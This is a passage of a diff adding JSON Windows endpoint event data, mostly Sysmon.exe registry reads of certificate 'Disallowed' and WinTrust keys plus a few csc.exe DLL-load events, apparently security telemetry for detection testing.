"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ole32.dll", + "image_path": "C:\\Windows\\SysWOW64\\ole32.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570859340000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570860740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570860740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570860740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570860740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570860740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570860740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570860740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570860740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570860740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570860740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570860740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570860740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570860740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570860740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570860740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\SysWOW64\\combase.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570860740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570860890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570860890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570860890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570860890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570860890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570860890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570861050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570861050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570861050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570861050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570861050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570861050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570861050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570861050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570861050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\SysWOW64\\ucrtbase.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570861050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570861210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570861210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570861210000, + 